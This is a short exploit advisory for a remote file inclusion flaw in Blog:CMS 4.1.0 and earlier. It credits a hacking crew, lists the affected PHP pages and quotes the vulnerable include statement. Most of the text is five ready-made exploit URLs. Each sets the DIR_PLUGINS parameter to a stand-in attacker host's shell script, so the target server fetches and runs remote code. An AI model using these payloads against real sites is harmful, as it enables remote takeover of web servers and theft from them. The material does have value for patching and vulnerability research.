Blog:Cms <= 4.1.0 Remote Inclusion File

Bug Found by Drago84 ToxiC CreW

Site Vendor :http://blogcms.com/

Page affetc:
index.php
media.php
archive.php
archives.php
blog.php

The Problem is:
include($DIR_PLUGINS."related/nusoap.php");

Expl:
http://www.sito.com/dir_blogccms/index.php?DIR_PLUGINS=http://evalsite.com/shell.php?
http://www.sito.com/dir_blogccms/admin/media.php?DIR_PLUGINS=http://evalsite.com/shell.php?
http://www.sito.com/dir_blogccms/extras/fancyurls/archive.php?DIR_PLUGINS=http://evalsite.com/shell.php?
http://www.sito.com/dir_blogccms/extras/fancyurls/archives.php?DIR_PLUGINS=http://evalsite.com/shell.php?
http://www.sito.com/dir_blogccms/extras/fancyurls/blog.php?DIR_PLUGINS=http://evalsite.com/shell.php?